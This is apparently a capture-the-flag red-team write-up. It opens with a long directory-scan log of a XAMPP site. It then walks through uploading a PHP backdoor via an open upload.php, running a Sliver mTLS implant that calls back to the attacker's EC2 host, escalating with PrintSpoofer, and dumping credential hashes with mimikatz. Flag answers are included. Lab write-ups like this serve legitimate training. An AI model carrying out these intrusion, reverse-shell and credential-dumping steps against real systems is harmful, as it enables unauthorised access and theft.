200 GET 428l 5896w 332579c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/phpinfo-section-2.png
200 GET 662l 2987w 200091c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp/image3.png
200 GET 990l 7221w 899476c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-start.jpg
200 GET 950l 4698w 417860c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/heartbleed-affected-osx.png
200 GET 385l 1620w 180620c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-run-installer.jpg
200 GET 37l 265w 20115c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/stack-icons.png
200 GET 996l 7189w 909082c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-windows-start.jpg
200 GET 509l 2484w 251673c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-wordpress.jpg
200 GET 1071l 7077w 888496c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-linux-start.jpg
200 GET 63l 321w 29058c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/xampp-cloud.png
301 GET 9l 30w 391c http://redteam-w324duut.darklabhackaday.com/dashboard/it => http://redteam-w324duut.darklabhackaday.com/dashboard/it/
301 GET 9l 30w 391c http://redteam-w324duut.darklabhackaday.com/dashboard/jp => http://redteam-w324duut.darklabhackaday.com/dashboard/jp/
200 GET 130l 433w 5422c http://redteam-w324duut.darklabhackaday.com/dashboard/ru/index.html
200 GET 516l 3545w 46038c http://redteam-w324duut.darklabhackaday.com/dashboard/ru/FAQ.html
200 GET 516l 3545w 46038c http://redteam-w324duut.darklabhackaday.com/dashboard/ru/faq.html
200 GET 130l 433w 5422c http://redteam-w324duut.darklabhackaday.com/dashboard/ru/Index.html
200 GET 130l 444w 5275c http://redteam-w324duut.darklabhackaday.com/dashboard/it/index.html
200 GET 516l 3885w 33903c http://redteam-w324duut.darklabhackaday.com/dashboard/it/faq.html
200 GET 516l 3885w 33903c http://redteam-w324duut.darklabhackaday.com/dashboard/it/FAQ.html
200 GET 114l 290w 4140c http://redteam-w324duut.darklabhackaday.com/dashboard/404.html
301 GET 9l 30w 382c http://redteam-w324duut.darklabhackaday.com/IMG => http://redteam-w324duut.darklabhackaday.com/IMG/
200 GET 5l 9w 694c http://redteam-w324duut.darklabhackaday.com/IMG/module_table_top.png
200 GET 3l 16w 1549c http://redteam-w324duut.darklabhackaday.com/IMG/module_table_bottom.png
200 GET 123l 380w 5715c http://redteam-w324duut.darklabhackaday.com/dashboard/it/howto.html
200 GET 130l 444w 5275c http://redteam-w324duut.darklabhackaday.com/dashboard/it/Index.html
200 GET 233l 790w 8615c http://redteam-w324duut.darklabhackaday.com/dashboard/Docs/create-framework-project-zf1.html
200 GET 9l 24w 212c http://redteam-w324duut.darklabhackaday.com/dashboard/Docs/access-phpmyadmin-remotely.pdfmarks
200 GET 2007l 7708w 329917c http://redteam-w324duut.darklabhackaday.com/dashboard/Docs/transfer-files-ftp.pdf
200 GET 130l 442w 5311c http://redteam-w324duut.darklabhackaday.com/dashboard/de/index.html
200 GET 516l 3759w 35477c http://redteam-w324duut.darklabhackaday.com/dashboard/de/faq.html
200 GET 130l 436w 5268c http://redteam-w324duut.darklabhackaday.com/dashboard/es/index.html
200 GET 516l 3776w 33076c http://redteam-w324duut.darklabhackaday.com/dashboard/es/faq.html
301 GET 9l 30w 393c http://redteam-w324duut.darklabhackaday.com/dashboard/Docs => http://redteam-w324duut.darklabhackaday.com/dashboard/Docs/
200 GET 130l 440w 5322c http://redteam-w324duut.darklabhackaday.com/dashboard/pl/index.html
200 GET 516l 3461w 33735c http://redteam-w324duut.darklabhackaday.com/dashboard/pl/faq.html
302 GET 0l 0w 0c http://redteam-w324duut.darklabhackaday.com/INDEX.php => http://redteam-w324duut.darklabhackaday.com/dashboard/
200 GET 130l 439w 5274c http://redteam-w324duut.darklabhackaday.com/dashboard/fr/index.html
200 GET 516l 3781w 33475c http://redteam-w324duut.darklabhackaday.com/dashboard/fr/faq.html
200 GET 130l 427w 5239c http://redteam-w324duut.darklabhackaday.com/dashboard/tr/index.html
200 GET 516l 3378w 33677c http://redteam-w324duut.darklabhackaday.com/dashboard/tr/faq.html
200 GET 516l 3759w 35477c http://redteam-w324duut.darklabhackaday.com/dashboard/de/FAQ.html
200 GET 516l 3461w 33735c http://redteam-w324duut.darklabhackaday.com/dashboard/pl/FAQ.html
200 GET 516l 3776w 33076c http://redteam-w324duut.darklabhackaday.com/dashboard/es/FAQ.html
200 GET 130l 410w 5366c http://redteam-w324duut.darklabhackaday.com/dashboard/jp/index.html
200 GET 516l 3272w 33666c http://redteam-w324duut.darklabhackaday.com/dashboard/jp/faq.html
301 GET 9l 30w 391c http://redteam-w324duut.darklabhackaday.com/dashboard/ro => http://redteam-w324duut.darklabhackaday.com/dashboard/ro/
200 GET 123l 379w 5733c http://redteam-w324duut.darklabhackaday.com/dashboard/de/howto.html
200 GET 516l 3781w 33475c http://redteam-w324duut.darklabhackaday.com/dashboard/fr/FAQ.html
200 GET 516l 3378w 33677c http://redteam-w324duut.darklabhackaday.com/dashboard/tr/FAQ.html
200 GET 123l 381w 5743c http://redteam-w324duut.darklabhackaday.com/dashboard/pl/howto.html
200 GET 123l 380w 5726c http://redteam-w324duut.darklabhackaday.com/dashboard/es/howto.html
200 GET 123l 380w 5726c http://redteam-w324duut.darklabhackaday.com/dashboard/fr/howto.html
200 GET 123l 377w 5702c http://redteam-w324duut.darklabhackaday.com/dashboard/tr/howto.html
200 GET 130l 447w 5315c http://redteam-w324duut.darklabhackaday.com/dashboard/ro/index.html
200 GET 516l 3732w 33775c http://redteam-w324duut.darklabhackaday.com/dashboard/ro/faq.html
200 GET 130l 440w 5322c http://redteam-w324duut.darklabhackaday.com/dashboard/pl/Index.html
200 GET 516l 3272w 33666c http://redteam-w324duut.darklabhackaday.com/dashboard/jp/FAQ.html
200 GET 130l 439w 5274c http://redteam-w324duut.darklabhackaday.com/dashboard/fr/Index.html
200 GET 130l 427w 5239c http://redteam-w324duut.darklabhackaday.com/dashboard/tr/Index.html
200 GET 123l 375w 5709c http://redteam-w324duut.darklabhackaday.com/dashboard/jp/howto.html
200 GET 516l 3732w 33775c http://redteam-w324duut.darklabhackaday.com/dashboard/ro/FAQ.html
301 GET 9l 30w 391c http://redteam-w324duut.darklabhackaday.com/dashboard/IT => http://redteam-w324duut.darklabhackaday.com/dashboard/IT/
200 GET 130l 410w 5366c http://redteam-w324duut.darklabhackaday.com/dashboard/jp/Index.html
200 GET 123l 382w 5728c http://redteam-w324duut.darklabhackaday.com/dashboard/ro/howto.html
301 GET 9l 30w 395c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES => http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/
200 GET 5l 47w 2036c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/apple-logo.png
200 GET 11l 79w 4243c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/background.png
200 GET 5l 47w 2036c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/appleVM-logo.png
200 GET 27l 253w 19113c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/sourceforge-logo@2x.png
200 GET 50l 99w 5427c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/xampp-logo.svg
200 GET 6l 66w 2819c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/windows-logo.png
200 GET 19l 154w 11138c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/social-icons-large@2x.png
200 GET 15l 93w 6731c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/pdf-icon.png
200 GET 8l 76w 4088c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/fastly-logo@2x.png
200 GET 7l 57w 2442c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/fastly-logo.png
200 GET 16l 155w 10943c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/sourceforge-logo.png
200 GET 33l 214w 12599c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/social-icons-large.png
200 GET 17l 132w 9021c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/social-icons@2x.png
200 GET 7l 76w 3900c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/favicon.png
200 GET 13l 93w 5327c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/social-icons.png
200 GET 10l 64w 2711c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/linux-logo.png
200 GET 85l 555w 39860c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp.png
200 GET 53l 392w 31074c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/addons-video-thumb.png
200 GET 40l 202w 14635c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/xampp-newsletter-logo.png
200 GET 63l 321w 29058c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/xampp-cloud.png
200 GET 37l 265w 20115c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/stack-icons.png
200 GET 357l 1795w 138791c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/twitter-bird.png
200 GET 71l 573w 44633c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/middleman.png
200 GET 57l 329w 30430c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp/image4.png
200 GET 200l 516w 30995c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp/image6.png
200 GET 361l 1179w 63156c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp/image7.png
200 GET 82l 513w 37591c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp/image1.png
200 GET 293l 799w 40142c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-3.png
200 GET 247l 765w 41974c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-php-output.png
200 GET 59l 418w 30054c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/team/daniel-lopez.png
200 GET 53l 283w 18022c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/team/paul-hinz.jpg
200 GET 415l 982w 45676c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-11.png
200 GET 71l 429w 32552c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/team/kay-vogelgesang.jpg
200 GET 391l 736w 32055c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-10.png
200 GET 82l 353w 27184c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/team/beltran-rueda.png
200 GET 118l 462w 38225c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/team/kai-seidler.jpg
200 GET 238l 900w 46506c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-2.png
200 GET 18l 77w 3411c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/stamps/stamp-173x38.gif
200 GET 5l 25w 1570c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/stamps/stamp-88x31.gif
200 GET 3l 13w 1665c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/stamps/stamp-80x15.gif
200 GET 267l 982w 70802c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-manager.png
200 GET 69l 596w 45129c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/download-xampp-vm.png
200 GET 1085l 2446w 95994c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-8.png
200 GET 453l 2324w 158417c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp/image5.png
200 GET 388l 2189w 119541c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-9.png
200 GET 198l 879w 148586c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-stack-manager.jpg
200 GET 213l 796w 131162c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-stack-manager-volumes.jpg
200 GET 662l 2987w 200091c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp/image3.png
200 GET 192l 819w 111554c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-launch-credentials.jpg
200 GET 514l 2774w 217526c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-tray.png
200 GET 269l 825w 45058c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-1.png
200 GET 190l 939w 149693c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-stack-manager-services.jpg
200 GET 306l 1208w 87718c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-volumes.png
200 GET 209l 978w 166567c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-stack-manager-general.jpg
200 GET 646l 2898w 150902c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-7.png
200 GET 261l 1347w 101068c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-general.png
200 GET 385l 1620w 180620c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-run-installer.jpg
200 GET 484l 2227w 119307c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-6.png
200 GET 293l 1440w 75826c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-4.png
200 GET 87l 511w 34878c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp/image2.png
200 GET 509l 2484w 251673c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-wordpress.jpg
200 GET 950l 4698w 417860c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/heartbleed-affected-osx.png
200 GET 317l 1398w 102812c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-network.png
200 GET 732l 2220w 112133c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-5.png
200 GET 356l 2370w 238837c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/heartbleed-fixed.png
200 GET 990l 7221w 899476c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-start.jpg
200 GET 428l 5896w 332579c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/phpinfo-section-2.png
200 GET 1071l 7077w 888496c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-linux-start.jpg
200 GET 403l 2814w 283442c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/phpinfo-section-1.png
200 GET 440l 2399w 256922c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/heartbleed-affected.png
200 GET 415l 3307w 178294c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-php-finder.png
200 GET 996l 7189w 909082c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-windows-start.jpg
200 GET 213l 962w 121742c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-download-installer.jpg
200 GET 230l 1035w 160961c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-stack-manager-network.jpg
200 GET 37l 267w 20117c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/stack-icons@2x.png
200 GET 116l 679w 55358c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/xampp-cloud@2x.png
301 GET 9l 30w 391c http://redteam-w324duut.darklabhackaday.com/dashboard/DE => http://redteam-w324duut.darklabhackaday.com/dashboard/DE/
200 GET 130l 444w 5275c http://redteam-w324duut.darklabhackaday.com/dashboard/IT/index.html
200 GET 130l 442w 5311c http://redteam-w324duut.darklabhackaday.com/dashboard/DE/index.html
200 GET 516l 3885w 33903c http://redteam-w324duut.darklabhackaday.com/dashboard/IT/faq.html
301 GET 9l 30w 401c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/flags => http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/flags/
200 GET 516l 3759w 35477c http://redteam-w324duut.darklabhackaday.com/dashboard/DE/faq.html
200 GET 123l 377w 5680c http://redteam-w324duut.darklabhackaday.com/dashboard/HOWTO.html
200 GET 516l 3885w 33903c http://redteam-w324duut.darklabhackaday.com/dashboard/IT/FAQ.html
200 GET 516l 3759w 35477c http://redteam-w324duut.darklabhackaday.com/dashboard/DE/FAQ.html
200 GET 123l 380w 5715c http://redteam-w324duut.darklabhackaday.com/dashboard/IT/howto.html
301 GET 9l 30w 391c http://redteam-w324duut.darklabhackaday.com/dashboard/FR => http://redteam-w324duut.darklabhackaday.com/dashboard/FR/
200 GET 130l 444w 5275c http://redteam-w324duut.darklabhackaday.com/dashboard/IT/Index.html
200 GET 123l 379w 5733c http://redteam-w324duut.darklabhackaday.com/dashboard/DE/howto.html
200 GET 130l 442w 5311c http://redteam-w324duut.darklabhackaday.com/dashboard/DE/Index.html
200 GET 130l 439w 5274c http://redteam-w324duut.darklabhackaday.com/dashboard/FR/index.html
200 GET 516l 3781w 33475c http://redteam-w324duut.darklabhackaday.com/dashboard/FR/faq.html
200 GET 123l 377w 5743c http://redteam-w324duut.darklabhackaday.com/dashboard/ru/HOWTO.html
200 GET 516l 3781w 33475c http://redteam-w324duut.darklabhackaday.com/dashboard/FR/FAQ.html
200 GET 130l 436w 5187c http://redteam-w324duut.darklabhackaday.com/dashboard/INDEX.html
200 GET 123l 380w 5726c http://redteam-w324duut.darklabhackaday.com/dashboard/FR/howto.html
200 GET 130l 439w 5274c http://redteam-w324duut.darklabhackaday.com/dashboard/FR/Index.html
301 GET 9l 30w 391c http://redteam-w324duut.darklabhackaday.com/dashboard/TR => http://redteam-w324duut.darklabhackaday.com/dashboard/TR/
200 GET 516l 3378w 33677c http://redteam-w324duut.darklabhackaday.com/dashboard/TR/faq.html
200 GET 130l 427w 5239c http://redteam-w324duut.darklabhackaday.com/dashboard/TR/index.html
200 GET 130l 433w 5422c http://redteam-w324duut.darklabhackaday.com/dashboard/ru/INDEX.html
200 GET 123l 377w 5702c http://redteam-w324duut.darklabhackaday.com/dashboard/TR/howto.html
301 GET 9l 30w 391c http://redteam-w324duut.darklabhackaday.com/dashboard/ur => http://redteam-w324duut.darklabhackaday.com/dashboard/ur/
200 GET 130l 427w 5239c http://redteam-w324duut.darklabhackaday.com/dashboard/TR/Index.html
200 GET 130l 444w 5275c http://redteam-w324duut.darklabhackaday.com/dashboard/it/INDEX.html
200 GET 123l 379w 5733c http://redteam-w324duut.darklabhackaday.com/dashboard/de/HOWTO.html
200 GET 130l 448w 5347c http://redteam-w324duut.darklabhackaday.com/dashboard/ur/index.html
301 GET 9l 30w 382c http://redteam-w324duut.darklabhackaday.com/Img => http://redteam-w324duut.darklabhackaday.com/Img/
200 GET 516l 4611w 42883c http://redteam-w324duut.darklabhackaday.com/dashboard/ur/faq.html
200 GET 3l 16w 1549c http://redteam-w324duut.darklabhackaday.com/Img/module_table_bottom.png
200 GET 5l 9w 694c http://redteam-w324duut.darklabhackaday.com/Img/module_table_top.png
200 GET 123l 381w 5743c http://redteam-w324duut.darklabhackaday.com/dashboard/pl/HOWTO.html
200 GET 123l 380w 5726c http://redteam-w324duut.darklabhackaday.com/dashboard/es/HOWTO.html
200 GET 123l 377w 5702c http://redteam-w324duut.darklabhackaday.com/dashboard/tr/HOWTO.html
200 GET 516l 4611w 42883c http://redteam-w324duut.darklabhackaday.com/dashboard/ur/FAQ.html
200 GET 123l 375w 5709c http://redteam-w324duut.darklabhackaday.com/dashboard/jp/HOWTO.html
200 GET 123l 385w 5786c http://redteam-w324duut.darklabhackaday.com/dashboard/ur/howto.html
200 GET 123l 382w 5728c http://redteam-w324duut.darklabhackaday.com/dashboard/ro/HOWTO.html
200 GET 130l 448w 5347c http://redteam-w324duut.darklabhackaday.com/dashboard/ur/Index.html
200 GET 130l 442w 5311c http://redteam-w324duut.darklabhackaday.com/dashboard/de/INDEX.html
200 GET 130l 440w 5322c http://redteam-w324duut.darklabhackaday.com/dashboard/pl/INDEX.html
200 GET 130l 436w 5268c http://redteam-w324duut.darklabhackaday.com/dashboard/es/INDEX.html
200 GET 130l 439w 5274c http://redteam-w324duut.darklabhackaday.com/dashboard/fr/INDEX.html
200 GET 123l 380w 5715c http://redteam-w324duut.darklabhackaday.com/dashboard/IT/HOWTO.html
200 GET 123l 379w 5733c http://redteam-w324duut.darklabhackaday.com/dashboard/DE/HOWTO.html
200 GET 130l 447w 5315c http://redteam-w324duut.darklabhackaday.com/dashboard/ro/INDEX.html
301 GET 9l 30w 391c http://redteam-w324duut.darklabhackaday.com/dashboard/PL => http://redteam-w324duut.darklabhackaday.com/dashboard/PL/
200 GET 130l 440w 5322c http://redteam-w324duut.darklabhackaday.com/dashboard/PL/index.html
200 GET 516l 3461w 33735c http://redteam-w324duut.darklabhackaday.com/dashboard/PL/faq.html
301 GET 9l 30w 386c http://redteam-w324duut.darklabhackaday.com/Uploads => http://redteam-w324duut.darklabhackaday.com/Uploads/
200 GET 16l 32w 406c http://redteam-w324duut.darklabhackaday.com/Uploads/upload.php
200 GET 130l 444w 5275c http://redteam-w324duut.darklabhackaday.com/dashboard/IT/INDEX.html
200 GET 130l 442w 5311c http://redteam-w324duut.darklabhackaday.com/dashboard/DE/INDEX.html
200 GET 123l 381w 5743c http://redteam-w324duut.darklabhackaday.com/dashboard/PL/howto.html
Within all of these, I paid attention to the uploads directory. Inside that directory, there was a file called upload.php. Right here is where users are able to upload ANY kind of file onto the server.
So, I uploaded a simple PHP backdoor and it printed out that the file was within the /inventory_files directory.
Going there, sure enough, our file is there!
Doing a simple whoami shows that our backdoor works!
So, to get a reverse shell on Sliver, an implant must be generated:
sliver > generate --mtls <EC2_IP_ADDRESS> --os windows --arch amd64 --format exe Once the implant has been generated, let's start listening to incoming connections with
sliver > mtlsThe implant was uploaded with upload.php and executed using the backdoor that was uploaded previously. With that, we got initial access, and by searching around, we got the flag!
Hack{[673878f24c96770007e3f614bb391eea56e2e8c36530e328ab937fca5c46de9f]}Category : Red Team
Points : 50
Good job and welcome! Easy flag
sliver (SOLID_DEVIANCE) > sa-whoami
[*] Successfully executed sa-whoami (coff-loader)
[*] Got output:
UserNameSID
====================== ====================================
WEB-SRV01\web_rootS-1-5-21-496616251-2340469536-2080137254-1008
GROUP INFORMATION Type SID Attributes
================================================= ===================== ============================================= ==================================================
WEB-SRV01\None Group S-1-5-21-496616251-2340469536-2080137254-513 Mandatory group, Enabled by default, Enabled group,
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group,
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group,
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group,
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group,
Mandatory Label\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group,
Privilege Name Description State
============================= ================================================= ===========================
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
[*] Session 7131c10e SOLID_DEVIANCE - 43.198.107.83:51886 (Web-SRV01) - windows/amd64 - Mon, 11 Nov 2024 02:10:14 UTCBy uploading PrintSpoofer and executing it along with our existing implant, we got a session with NT AUTHORITY\SYSTEM privileges. Note that to execute commands from the implant, you have to prefix the command with execute and if you want to see an output of the command you can add a -o switch after the execute command.
Going into the user, tester's Desktop, the second flag was found.
Hack{[lacc2af79ea334020fe975b24998e093e0bf73d424836c0504a87d99c7b65l52]}Category : Red Team
Points : 100
Dont stay in one machine, try to jump out of the box!
Doing ipconfig /all reveals the compromised machine's network information which can be used to access the internal network. As you can see, Web-SRV01 has the internal IP address of 172.31.43.219 and has a pointer to a DNS server of the IP address 172.31.36.211. The DNS IP address of a domain-joined machine is most likely the IP address of the Domain Controller.
PS C:\windows\tasks> ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : Web-SRV01
Primary Dns Suffix . . . . . . . : corp.darklab.local
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : ap-east-1.ec2-utilities.amazonaws.com
ap-east-1.compute.internal
Ethernet adapter Ethernet 3:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Amazon Elastic Network Adapter
Physical Address. . . . . . . . . : 06-0B-2A-D8-F1-73
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 172.31.43.219(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 172.31.32.1
DNS Servers . . . . . . . . . . . : 172.31.36.211
NetBIOS over Tcpip. . . . . . . . : EnabledUploading mimikatz.exe to see if there are any cached credentials that revealed nothing.
PS C:\windows\tasks> .\mimikatz.exe privilege::debug sekurlsa::logonpasswords
.\mimikatz.exe privilege::debug sekurlsa::logonpasswords
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 61997 (00000000:0000f22d)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 11/6/2024 3:23:31 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WEB-SRV01$
* Domain : CORP
* NTLM : 2721539d17b4772c0b4b43a5aecaa0b1
* SHA1 : 90d410b567bdd199d3ce107e440219ef43b80982
* DPAPI : 90d410b567bdd199d3ce107e440219ef
tspkg :
wdigest :
* Username : WEB-SRV01$
* Domain : CORP
* Password : (null)
kerberos :
* Username : WEB-SRV01$
* Domain : corp.darklab.local
* Password : d6 59 b8 c1 30 ac 21 32 be ad ce c5 db e2 0b 19 63 86 5e 18 84 a9 e9 79 74 59 ad 38 59 83 c5 2c 41 2f 28 b8 a7 e1 45 31 c2 0d 66 d7 5d fc 1f 82 d2 27 b0 53 d6 b9 bc f7 a8 9f c9 04 11 40 bc bb 7d d3 14 64 87 c8 7d 58 1e d7 a6 56 c0 d3 11 a0 61 e2 77 58 ea 6a f6 9f cb 66 bb 32 21 d0 19 22 7c c6 23 d6 b5 4c 41 a2 d5 44 82 db 1f 26 7a 1a 04 62 40 b0 58 d8 d1 a3 b7 d3 fa 82 01 21 c9 5d 6d 7a 06 1d 63 04 9c 95 0a a1 59 26 52 fa e3 50 a1 61 6a 1a 72 ee 09 0e 39 96 32 da 52 11 9b 1f ab a9 e3 d5 d1 f3 e8 70 dc 40 7f 47 bc dc 4a 29 a1 f4 ae c2 4e dc cc 6a c6 cd 67 95 10 d5 68 2a b3 d3 8a 93 98 c4 f0 20 e2 e7 56 13 95 0c 4c f2 82 b7 4b 15 7b 9e f5 f2 14 46 35 0d 29 88 f0 46 36 ad 0d 4b 1a fd 74 68 37 06 24 32 7a 95 26 e6
ssp :
credman :
Authentication Id : 0 ; 61981 (00000000:0000f21d)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 11/6/2024 3:23:31 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WEB-SRV01$
* Domain : CORP
* NTLM : 2721539d17b4772c0b4b43a5aecaa0b1
* SHA1 : 90d410b567bdd199d3ce107e440219ef43b80982
* DPAPI : 90d410b567bdd199d3ce107e440219ef
tspkg :
wdigest :
* Username : WEB-SRV01$
* Domain : CORP
* Password : (null)
kerberos :
* Username : WEB-SRV01$
* Domain : corp.darklab.local
